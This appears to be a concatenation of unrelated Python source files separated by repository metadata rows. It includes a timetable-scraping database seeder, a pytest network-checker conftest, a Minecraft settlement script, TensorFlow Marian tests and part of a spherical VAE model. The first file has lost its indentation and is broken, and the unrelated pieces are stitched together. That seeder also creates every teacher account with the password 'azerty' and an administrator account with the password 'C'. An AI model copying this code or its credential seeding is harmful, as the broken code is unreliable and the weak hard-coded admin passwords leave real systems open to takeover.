texts = [opt.text for opt in options if opt.get('value') != None]
profs = set()
matieres = set()
# Les matières dans lesquel un prof enseigne
matieres_prof = {}
# Pour chaque page de l'EDT (toutes les classes)
for page in pages:
print(page)
xml = page.split('.')[0] + ".xml"
tree = ET.fromstring(requests.get(f'http://chronos.iut-velizy.uvsq.fr/EDT/{xml}').content)
profs_classe = []
# Récupère toutes les cases de l'EDT
for ressource in tree.findall('.//resources'):
staff = ressource.find('staff')
module = ressource.find('module')
# S'il y a au moins un prof et une matière
if staff and module:
# Ajoute chaque prof et chaque matière à chaqueprof
for prof in list(staff):
p = prof.text
profs.add(p)
if not p in matieres_prof:
matieres_prof[p] = set()
for mat in list(module):
m = mat.text
matieres.add(m)
matieres_prof[p].add(m)
db = sqlite3.connect('src/devoirs.db')
c = db.cursor()
sql_str = open('db.sql').read()
c.executescript(sql_str)
print('Insertion classes')
for classe in texts:
c.execute('INSERT INTO classes (nom) VALUES (?);', [classe])
print('Insertion matieres')
for matiere in matieres:
c.execute('INSERT INTO matiere (nom) VALUES (?);', [matiere])
def split_infos(infos):
*nom_parties, prenom = infos.split(' ')
nom = ' '.join(nom_parties)
nom_login = nom[:5].replace(' ', '').lower()
prenom_login = prenom[:4].replace(' ', '').lower()
login = f'{prenom_login}.{nom_login}'
return login, nom, prenom
login_profs = {}
print('Insertion profs')
for prof in profs:
pwd = generate_password_hash('azerty')
login, nom, prenom = split_infos(prof)
login_profs[prof] = login
c.execute("""
INSERT INTO enseignant (login, nom, prenom, mail, pwd, admin)
VALUES (?, ?, ?, '', ?, 0);
""", [login, nom, prenom, pwd])
print('Insertion matiere prof')
for prof, mats in matieres_prof.items():
for mat in mats:
c.execute("""
INSERT INTO matiere_enseignant (enseignant_id, matiere_id)
VALUES ((SELECT id FROM enseignant WHERE login = ?),
(SELECT id FROM matiere WHERE nom = ?));
""", [login_profs[prof], mat])
pwd = generate_password_hash('C')
c.execute("INSERT INTO enseignant (login,nom,prenom,mail,pwd,admin)VALUES ('a', 'a','b','c', ?, 1);", [pwd])
pwd = generate_password_hash('SQL')
c.execute("INSERT INTO enseignant (login,nom,prenom,mail,pwd,admin) VALUES ('s', 's','q','l', ?, 0);", [pwd])
c.close()
db.commit()
| 33.397849 | 109 | 0.622344 |
c8aabfaa466e417ba3a78e727d750448e0a714ec | 1,514 | py | Python | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | 1 | 2021-04-06T16:13:35.000Z | 2021-04-06T16:13:35.000Z | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | null | null | null | network_checker/conftest.py | Zipfer/fuel-web | c6c4032eb6e29474e2be0318349265bdb566454c | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
PIDFILE = '/tmp/vde_network_checker'
IFACES = ['tap11', 'tap12']
def pytest_addoption(parser):
parser.addoption("--vde", action='store_true', default=False,
help="Use vde switch for network verification.")
def pytest_configure(config):
if config.getoption('vde'):
base = 'vde_switch -p {pidfile} -d'.format(pidfile=PIDFILE)
command = [base]
taps = ['-tap {tap}'.format(tap=tap) for tap in IFACES]
full_command = command + taps
os.system(' '.join(full_command))
for tap in IFACES:
os.system('ifconfig {tap} up'.format(tap=tap))
os.environ['NET_CHECK_IFACE_1'] = IFACES[0]
os.environ['NET_CHECK_IFACE_2'] = IFACES[1]
def pytest_unconfigure(config):
if os.path.exists(PIDFILE):
with open(PIDFILE) as f:
pid = f.read().strip()
os.kill(int(pid), 15)
| 33.644444 | 78 | 0.653897 |
43d727b282a863f3e9e9811bc7e07c026d0cb3a4 | 1,346 | py | Python | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | main.py | Niels-NTG/GDMC2021MGAI | 54138ff16f24bc6c8615e54239a3d6c9245113ba | [
"MIT"
] | null | null | null | import interfaceUtils
import HousingBlock
# Set to True to enable multi-threading. This will make the build go slightly faster, but can also crash the
# Minecraft Forge server/client when there are too many threads, which may occur when constructing in a large
# build area.
USE_THREADING = False
def getBuildArea(area=(0, 0, 128, 128)):
# x position, z position, x size, z size
# see if a build area has been specified
# you can set a build area in minecraft using the /setbuildarea command
serverBuildArea = interfaceUtils.requestBuildArea()
if serverBuildArea != -1:
x1 = serverBuildArea["xFrom"]
z1 = serverBuildArea["zFrom"]
x2 = serverBuildArea["xTo"]
z2 = serverBuildArea["zTo"]
area = (x1, z1, x2 - x1, z2 - z1)
print("working in area xz s%s" % (str(area)))
return area
buildArea = getBuildArea()
HousingBlock.USE_THREADING = USE_THREADING
settlementSizeX = 0
while settlementSizeX <= buildArea[2]:
settlementSizeZ = 0
while settlementSizeZ <= buildArea[3]:
housingBlock = HousingBlock.HousingBlock(
x=buildArea[0] + settlementSizeX, z=buildArea[1] + settlementSizeZ
)
settlementSizeZ += housingBlock.getSizeZ()
housingBlock.place()
settlementSizeX += housingBlock.getSizeX()
interfaceUtils.sendBlocks()
| 31.302326 | 109 | 0.693908 |
dec14450a9dfb575457b578198456990d3a96c16 | 17,306 | py | Python | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_tf_marian.py | sunjiao123sun/transformers | c994eca173f0eaf818caf4cc93148a4b040a6b04 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
import unittest
import warnings
from transformers import AutoTokenizer, MarianConfig, MarianTokenizer, TranslationPipeline, is_tf_available
from transformers.file_utils import cached_property
from transformers.testing_utils import require_sentencepiece, require_tf, require_tokenizers, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers import TFAutoModelForSeq2SeqLM, TFMarianModel, TFMarianMTModel
@require_tf
class TFMarianModelTester:
config_cls = MarianConfig
config_updates = {}
hidden_act = "gelu"
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_labels=False,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=20,
eos_token_id=2,
pad_token_id=1,
bos_token_id=0,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.eos_token_id = eos_token_id
self.pad_token_id = pad_token_id
self.bos_token_id = bos_token_id
def prepare_config_and_inputs_for_common(self):
input_ids = ids_tensor([self.batch_size, self.seq_length - 1], self.vocab_size)
eos_tensor = tf.expand_dims(tf.constant([self.eos_token_id] * self.batch_size), 1)
input_ids = tf.concat([input_ids, eos_tensor], axis=1)
decoder_input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
config = self.config_cls(
vocab_size=self.vocab_size,
d_model=self.hidden_size,
encoder_layers=self.num_hidden_layers,
decoder_layers=self.num_hidden_layers,
encoder_attention_heads=self.num_attention_heads,
decoder_attention_heads=self.num_attention_heads,
encoder_ffn_dim=self.intermediate_size,
decoder_ffn_dim=self.intermediate_size,
dropout=self.hidden_dropout_prob,
attention_dropout=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
eos_token_ids=[2],
bos_token_id=self.bos_token_id,
pad_token_id=self.pad_token_id,
decoder_start_token_id=self.pad_token_id,
**self.config_updates,
)
inputs_dict = prepare_marian_inputs_dict(config, input_ids, decoder_input_ids)
return config, inputs_dict
def check_decoder_model_past_large_inputs(self, config, inputs_dict):
model = TFMarianModel(config=config).get_decoder()
input_ids = inputs_dict["input_ids"]
input_ids = input_ids[:1, :]
attention_mask = inputs_dict["attention_mask"][:1, :]
self.batch_size = 1
# first forward pass
outputs = model(input_ids, attention_mask=attention_mask, use_cache=True)
output, past_key_values = outputs.to_tuple()
past_key_values = past_key_values[1]
        # create hypothetical next token and extend to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_attn_mask = tf.cast(ids_tensor((self.batch_size, 3), 2), tf.int8)
# append to next input_ids and
next_input_ids = tf.concat([input_ids, next_tokens], axis=-1)
next_attention_mask = tf.concat([attention_mask, next_attn_mask], axis=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)[0]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past_key_values)[0]
self.parent.assertEqual(next_tokens.shape[1], output_from_past.shape[1])
# select random slice
random_slice_idx = int(ids_tensor((1,), output_from_past.shape[-1]))
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx]
output_from_past_slice = output_from_past[:, :, random_slice_idx]
# test that outputs are equal for slice
tf.debugging.assert_near(output_from_past_slice, output_from_no_past_slice, rtol=1e-3)
def prepare_marian_inputs_dict(
config,
input_ids,
decoder_input_ids,
attention_mask=None,
decoder_attention_mask=None,
):
if attention_mask is None:
attention_mask = tf.cast(tf.math.not_equal(input_ids, config.pad_token_id), tf.int8)
if decoder_attention_mask is None:
decoder_attention_mask = tf.concat(
[
tf.ones(decoder_input_ids[:, :1].shape, dtype=tf.int8),
tf.cast(tf.math.not_equal(decoder_input_ids[:, 1:], config.pad_token_id), tf.int8),
],
axis=-1,
)
return {
"input_ids": input_ids,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
}
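# Illustration of the default masks built above (assuming pad_token_id=1):
#   input_ids         [[5, 6, 2, 1]] -> attention_mask         [[1, 1, 1, 0]]
#   decoder_input_ids [[1, 7, 8, 1]] -> decoder_attention_mask [[1, 1, 1, 0]]
# (the first decoder position is always unmasked; the remaining positions follow the pad-token rule).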
@require_tf
class TFMarianModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (TFMarianMTModel, TFMarianModel) if is_tf_available() else ()
all_generative_model_classes = (TFMarianMTModel,) if is_tf_available() else ()
is_encoder_decoder = True
test_pruning = False
def setUp(self):
self.model_tester = TFMarianModelTester(self)
self.config_tester = ConfigTester(self, config_class=MarianConfig)
def test_config(self):
self.config_tester.run_common_tests()
def test_decoder_model_past_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs_for_common()
self.model_tester.check_decoder_model_past_large_inputs(*config_and_inputs)
def test_compile_tf_model(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
optimizer = tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08, clipnorm=1.0)
loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
metric = tf.keras.metrics.SparseCategoricalAccuracy("accuracy")
model_class = self.all_generative_model_classes[0]
input_ids = {
"decoder_input_ids": tf.keras.Input(batch_shape=(2, 2000), name="decoder_input_ids", dtype="int32"),
"input_ids": tf.keras.Input(batch_shape=(2, 2000), name="input_ids", dtype="int32"),
}
# Prepare our model
model = model_class(config)
model(self._prepare_for_class(inputs_dict, model_class)) # Model must be called before saving.
# Let's load it from the disk to be sure we can use pre-trained weights
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model = model_class.from_pretrained(tmpdirname)
outputs_dict = model(input_ids)
hidden_states = outputs_dict[0]
# Add a dense layer on top to test integration with other keras modules
outputs = tf.keras.layers.Dense(2, activation="softmax", name="outputs")(hidden_states)
# Compile extended model
extended_model = tf.keras.Model(inputs=[input_ids], outputs=[outputs])
extended_model.compile(optimizer=optimizer, loss=loss, metrics=[metric])
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert isinstance(name, dict)
for k, v in name.items():
assert isinstance(v, tf.Variable)
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
@slow
def test_saved_model_with_hidden_states_output(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
@slow
def test_saved_model_with_attentions_output(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_saved_model_creation(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_saved_model_creation_extended(self):
# TODO(JPLU, PVP) - fix this with s2s tf-serving PR
pass
def test_resize_token_embeddings(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
def _get_word_embedding_weight(model, embedding_layer):
if hasattr(embedding_layer, "weight"):
return embedding_layer.weight
else:
                # Here we build the word embedding weights if they do not exist yet.
# And then we retry to get the attribute once built.
model(model.dummy_inputs)
if hasattr(embedding_layer, "weight"):
return embedding_layer.weight
else:
return None
for model_class in self.all_model_classes:
for size in [config.vocab_size - 10, config.vocab_size + 10, None]:
# build the embeddings
model = model_class(config=config)
old_input_embeddings = _get_word_embedding_weight(model, model.get_input_embeddings())
old_output_embeddings = _get_word_embedding_weight(model, model.get_output_embeddings())
old_final_logits_bias = model.get_bias()
# reshape the embeddings
model.resize_token_embeddings(size)
new_input_embeddings = _get_word_embedding_weight(model, model.get_input_embeddings())
new_output_embeddings = _get_word_embedding_weight(model, model.get_output_embeddings())
new_final_logits_bias = model.get_bias()
# check that the resized embeddings size matches the desired size.
assert_size = size if size is not None else config.vocab_size
self.assertEqual(new_input_embeddings.shape[0], assert_size)
# check that weights remain the same after resizing
models_equal = True
for p1, p2 in zip(old_input_embeddings.value(), new_input_embeddings.value()):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
if old_output_embeddings is not None and new_output_embeddings is not None:
self.assertEqual(new_output_embeddings.shape[0], assert_size)
models_equal = True
for p1, p2 in zip(old_output_embeddings.value(), new_output_embeddings.value()):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
if old_final_logits_bias is not None and new_final_logits_bias is not None:
old_final_logits_bias = old_final_logits_bias["final_logits_bias"]
new_final_logits_bias = new_final_logits_bias["final_logits_bias"]
self.assertEqual(new_final_logits_bias.shape[0], 1)
self.assertEqual(new_final_logits_bias.shape[1], assert_size)
models_equal = True
for old, new in zip(old_final_logits_bias.value(), new_final_logits_bias.value()):
for p1, p2 in zip(old, new):
if tf.math.reduce_sum(tf.math.abs(p1 - p2)) > 0:
models_equal = False
self.assertTrue(models_equal)
def _assert_tensors_equal(a, b, atol=1e-12, prefix=""):
"""If tensors not close, or a and b arent both tensors, raise a nice Assertion error."""
if a is None and b is None:
return True
try:
if tf.debugging.assert_near(a, b, atol=atol):
return True
raise
except Exception:
msg = "{} != {}".format(a, b)
if prefix:
msg = prefix + ": " + msg
raise AssertionError(msg)
def _long_tensor(tok_lst):
return tf.constant(tok_lst, dtype=tf.int32)
class AbstractMarianIntegrationTest(unittest.TestCase):
maxDiff = 1000 # show more chars for failing integration tests
@classmethod
def setUpClass(cls) -> None:
cls.model_name = f"Helsinki-NLP/opus-mt-{cls.src}-{cls.tgt}"
return cls
@cached_property
def tokenizer(self) -> MarianTokenizer:
return AutoTokenizer.from_pretrained(self.model_name)
@property
def eos_token_id(self) -> int:
return self.tokenizer.eos_token_id
@cached_property
def model(self):
warnings.simplefilter("error")
model: TFMarianMTModel = TFAutoModelForSeq2SeqLM.from_pretrained(self.model_name, from_pt=True)
assert isinstance(model, TFMarianMTModel)
c = model.config
self.assertListEqual(c.bad_words_ids, [[c.pad_token_id]])
self.assertEqual(c.max_length, 512)
self.assertEqual(c.decoder_start_token_id, c.pad_token_id)
return model
def _assert_generated_batch_equal_expected(self, **tokenizer_kwargs):
generated_words = self.translate_src_text(**tokenizer_kwargs)
self.assertListEqual(self.expected_text, generated_words)
def translate_src_text(self, **tokenizer_kwargs):
model_inputs = self.tokenizer.prepare_seq2seq_batch(
src_texts=self.src_text, **tokenizer_kwargs, return_tensors="tf"
)
generated_ids = self.model.generate(
model_inputs.input_ids, attention_mask=model_inputs.attention_mask, num_beams=2, max_length=128
)
generated_words = self.tokenizer.batch_decode(generated_ids.numpy(), skip_special_tokens=True)
return generated_words
@require_sentencepiece
@require_tokenizers
class TestMarian_MT_EN(AbstractMarianIntegrationTest):
"""Cover low resource/high perplexity setting. This breaks if pad_token_id logits not set to LARGE_NEGATIVE."""
src = "mt"
tgt = "en"
src_text = ["Billi messu b'mod ġentili, Ġesù fejjaq raġel li kien milqut bil - marda kerha tal - ġdiem."]
expected_text = ["Touching gently, Jesus healed a man who was affected by the sad disease of leprosy."]
@slow
def test_batch_generation_mt_en(self):
self._assert_generated_batch_equal_expected()
@require_sentencepiece
@require_tokenizers
class TestMarian_en_zh(AbstractMarianIntegrationTest):
src = "en"
tgt = "zh"
src_text = ["My name is Wolfgang and I live in Berlin"]
expected_text = ["我叫沃尔夫冈 我住在柏林"]
@slow
def test_batch_generation_en_zh(self):
self._assert_generated_batch_equal_expected()
@require_sentencepiece
@require_tokenizers
class TestMarian_en_ROMANCE(AbstractMarianIntegrationTest):
"""Multilingual on target side."""
src = "en"
tgt = "ROMANCE"
src_text = [
">>fr<< Don't spend so much time watching TV.",
">>pt<< Your message has been sent.",
">>es<< He's two years older than me.",
]
expected_text = [
"Ne passez pas autant de temps à regarder la télé.",
"A sua mensagem foi enviada.",
"Es dos años más viejo que yo.",
]
@slow
def test_batch_generation_en_ROMANCE_multi(self):
self._assert_generated_batch_equal_expected()
@slow
def test_pipeline(self):
pipeline = TranslationPipeline(self.model, self.tokenizer, framework="tf")
output = pipeline(self.src_text)
self.assertEqual(self.expected_text, [x["translation_text"] for x in output])
| 39.875576 | 117 | 0.672946 |
1eadc6039d05c5d5b5b3a2eae61bdf65e1e82afb | 21,452 | py | Python | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | 2 | 2021-12-17T10:14:31.000Z | 2022-01-24T17:17:01.000Z | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | null | null | null | surfify/models/vae.py | neurospin-deepinsight/surfify | 68ba674c20e759ee9c56acbd4a1a44781d35a68c | [
"CECILL-B"
] | 3 | 2021-09-16T08:26:19.000Z | 2022-01-23T18:31:50.000Z | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2021
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Cortical Spherical Variational Auto-Encoder (GMVAE) models.
[1] Representation Learning of Resting State fMRI with Variational
Autoencoder: https://github.com/libilab/rsfMRI-VAE
"""
# Imports
import torch
import torch.nn as nn
from torch.distributions import Normal
from ..utils import get_logger, debug_msg
from ..nn import IcoUpConv, IcoPool, IcoSpMaConv, IcoSpMaConvTranspose
from .base import SphericalBase
# Global parameters
logger = get_logger()
class SphericalVAE(SphericalBase):
""" Spherical VAE architecture.
Use either RePa - Rectangular Patch convolution method or DiNe - Direct
Neighbor convolution method.
Notes
-----
    Debugging messages can be displayed by changing the log level using
``setup_logging(level='debug')``.
See Also
--------
SphericalGVAE
References
----------
Representation Learning of Resting State fMRI with Variational
Autoencoder, NeuroImage 2021.
Examples
--------
>>> import torch
>>> from surfify.utils import icosahedron
>>> from surfify.models import SphericalVAE
>>> verts, tris = icosahedron(order=6)
>>> x = torch.zeros((1, 2, len(verts)))
>>> model = SphericalVAE(
>>> input_channels=2, input_order=6, latent_dim=64,
>>> conv_flts=[32, 32, 64, 64], conv_mode="DiNe", dine_size=1,
    >>>     fusion_level=2, standard_ico=False)
>>> print(model)
>>> out = model(x, x)
>>> print(out[0].shape, out[1].shape)
"""
def __init__(self, input_channels=1, input_order=5, latent_dim=64,
conv_flts=[32, 32, 64, 64], conv_mode="DiNe", dine_size=1,
repa_size=5, repa_zoom=5, dynamic_repa_zoom=False,
fusion_level=1, standard_ico=False, cachedir=None):
""" Init class.
Parameters
----------
input_channels: int, default 1
the number of input channels.
input_order: int, default 5
the input icosahedron order.
latent_dim: int, default 64
the size of the stochastic latent state of the SVAE.
conv_flts: list of int
the size of convolutional filters.
conv_mode: str, default 'DiNe'
use either 'RePa' - Rectangular Patch convolution method or 'DiNe'
- 1 ring Direct Neighbor convolution method.
dine_size: int, default 1
the size of the spherical convolution filter, ie. the number of
neighbor rings to be considered.
repa_size: int, default 5
the size of the rectangular grid in the tangent space.
repa_zoom: int, default 5
control the rectangular grid spacing in the tangent space by
applying a multiplicative factor of `1 / repa_zoom`.
dynamic_repa_zoom: bool, default False
dynamically adapt the RePa zoom by applying a multiplicative factor
of `log(order + 1) + 1`.
fusion_level: int, default 1
at which max pooling level left and right hemisphere data
are concatenated.
standard_ico: bool, default False
optionaly use surfify tesselation.
cachedir: str, default None
set this folder to use smart caching speedup.
"""
logger.debug("SphericalVAE init...")
super(SphericalVAE, self).__init__(
input_order=input_order, n_layers=len(conv_flts),
conv_mode=conv_mode, dine_size=dine_size, repa_size=repa_size,
repa_zoom=repa_zoom, dynamic_repa_zoom=dynamic_repa_zoom,
standard_ico=standard_ico, cachedir=cachedir)
self.input_channels = input_channels
self.latent_dim = latent_dim
self.conv_flts = conv_flts
self.top_flatten_dim = len(
self.ico[self.input_order - self.n_layers + 1].vertices)
self.top_final = self.conv_flts[-1] * self.top_flatten_dim
if fusion_level > self.n_layers or fusion_level <= 0:
raise ValueError("Impossible to use input fusion level with "
"'{0}' layers.".format(self.n_layers))
self.fusion_level = fusion_level
# define the encoder
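        # Left and right hemispheres are encoded by separate convolution branches for the
        # first `fusion_level` blocks; at that depth the two feature maps are concatenated
        # on the channel axis (hence input_channels is doubled below) and the remaining
        # blocks form a single shared branch.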
self.enc_left_conv = nn.Sequential()
self.enc_right_conv = nn.Sequential()
self.enc_w_conv = nn.Sequential()
multi_path = True
input_channels = self.input_channels
for idx in range(self.n_layers):
order = self.input_order - idx
if idx == self.fusion_level:
multi_path = False
input_channels *= 2
if idx != 0:
pooling = IcoPool(
down_neigh_indices=self.ico[order + 1].neighbor_indices,
down_indices=self.ico[order + 1].down_indices,
pooling_type="mean")
if idx != 0 and multi_path:
self.enc_left_conv.add_module("pooling_{0}".format(idx),
pooling)
self.enc_right_conv.add_module("pooling_{0}".format(idx),
pooling)
elif idx != 0:
self.enc_w_conv.add_module("pooling_{0}".format(idx), pooling)
if multi_path:
output_channels = int(self.conv_flts[idx] / 2)
lconv = self.sconv(
input_channels, output_channels,
self.ico[order].conv_neighbor_indices)
self.enc_left_conv.add_module("l_enc_{0}".format(idx), lconv)
rconv = self.sconv(
input_channels, output_channels,
self.ico[order].conv_neighbor_indices)
self.enc_right_conv.add_module("r_enc_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = self.sconv(
input_channels, self.conv_flts[idx],
self.ico[order].conv_neighbor_indices)
self.enc_w_conv.add_module("enc_{0}".format(idx), conv)
input_channels = self.conv_flts[idx]
self.enc_w_dense = nn.Linear(self.top_final, self.latent_dim * 2)
# define the decoder
self.dec_w_dense = nn.Linear(self.latent_dim, self.top_final)
self.dec_w_conv = nn.Sequential()
self.dec_left_conv = nn.Sequential()
self.dec_right_conv = nn.Sequential()
input_channels = self.conv_flts[self.n_layers - 1]
if self.fusion_level == self.n_layers:
multi_path = True
input_channels = int(input_channels / 2)
else:
multi_path = False
for idx in range(self.n_layers - 1, -1, -1):
if multi_path:
if idx == 0:
output_channels = self.input_channels
else:
output_channels = int(self.conv_flts[idx - 1] / 2)
lconv = IcoUpConv(
in_feats=input_channels, out_feats=output_channels,
up_neigh_indices=self.ico[order].neighbor_indices,
down_indices=self.ico[order].down_indices)
self.dec_left_conv.add_module("l_dec_{0}".format(idx), lconv)
rconv = IcoUpConv(
in_feats=input_channels, out_feats=output_channels,
up_neigh_indices=self.ico[order].neighbor_indices,
down_indices=self.ico[order].down_indices)
self.dec_right_conv.add_module("r_dec_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoUpConv(
in_feats=input_channels, out_feats=self.conv_flts[idx - 1],
up_neigh_indices=self.ico[order + 1].neighbor_indices,
down_indices=self.ico[order + 1].down_indices)
self.dec_w_conv.add_module("dec_{0}".format(idx), conv)
input_channels = self.conv_flts[idx - 1]
if idx == self.fusion_level:
multi_path = True
input_channels = int(input_channels / 2)
order += 1
self.relu = nn.ReLU(inplace=True)
def encode(self, left_x, right_x):
""" The encoder.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
q(z | x): Normal (batch_size, <latent_dim>)
a Normal distribution.
"""
left_x = self._safe_forward(self.enc_left_conv, left_x,
act=self.relu, skip_last_act=True)
right_x = self._safe_forward(self.enc_right_conv, right_x,
act=self.relu, skip_last_act=True)
x = torch.cat((left_x, right_x), dim=1)
x = self.relu(x)
x = self._safe_forward(self.enc_w_conv, x, act=self.relu)
x = x.reshape(-1, self.top_final)
x = self.enc_w_dense(x)
z_mu, z_logvar = torch.chunk(x, chunks=2, dim=1)
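        # The dense layer outputs 2 * latent_dim values that are split into the posterior
        # mean and log-variance; scale = exp(logvar) ** 0.5 = exp(logvar / 2), i.e. the
        # standard deviation of q(z | x).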
return Normal(loc=z_mu, scale=z_logvar.exp().pow(0.5))
def decode(self, z):
""" The decoder.
Parameters
----------
z: Tensor (samples, <latent_dim>)
the stochastic latent state z.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
x = self.relu(self.dec_w_dense(z))
x = x.view(-1, self.conv_flts[-1], self.top_flatten_dim)
x = self._safe_forward(self.dec_w_conv, x, act=self.relu)
left_recon_x, right_recon_x = torch.chunk(x, chunks=2, dim=1)
left_recon_x = self._safe_forward(self.dec_left_conv, left_recon_x,
act=self.relu, skip_last_act=True)
right_recon_x = self._safe_forward(self.dec_right_conv, right_recon_x,
act=self.relu, skip_last_act=True)
return left_recon_x, right_recon_x
def reparameterize(self, q):
""" Implement the reparametrization trick.
"""
if self.training:
z = q.rsample()
else:
z = q.loc
return z
def forward(self, left_x, right_x):
""" The forward method.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
logger.debug("SphericalVAE forward pass")
logger.debug(debug_msg("left cortical", left_x))
logger.debug(debug_msg("right cortical", right_x))
q = self.encode(left_x, right_x)
logger.debug(debug_msg("posterior loc", q.loc))
logger.debug(debug_msg("posterior scale", q.scale))
z = self.reparameterize(q)
logger.debug(debug_msg("z", z))
left_recon_x, right_recon_x = self.decode(z)
logger.debug(debug_msg("left recon cortical", left_recon_x))
logger.debug(debug_msg("right recon cortical", right_recon_x))
return left_recon_x, right_recon_x, {"q": q, "z": z}
class SphericalGVAE(nn.Module):
""" Spherical Grided VAE architecture.
Use SpMa - Spherical Mapping convolution method.
Notes
-----
    Debugging messages can be displayed by changing the log level using
``setup_logging(level='debug')``.
See Also
--------
SphericalVAE
References
----------
Representation Learning of Resting State fMRI with Variational
Autoencoder, NeuroImage 2021.
Examples
--------
>>> import torch
>>> from surfify.models import SphericalGVAE
>>> x = torch.zeros((1, 2, 192, 192))
>>> model = SphericalGVAE(
>>> input_channels=2, input_dim=192, latent_dim=64,
>>> conv_flts=[64, 128, 128, 256, 256], fusion_level=2)
>>> print(model)
>>> out = model(x, x)
>>> print(out[0].shape, out[1].shape)
"""
def __init__(self, input_channels=1, input_dim=192, latent_dim=64,
conv_flts=[64, 128, 128, 256, 256], fusion_level=1):
""" Init class.
Parameters
----------
input_channels: int, default 1
the number of input channels.
input_dim: int, default 192
the size of the converted 3-D surface to the 2-D grid.
latent_dim: int, default 64
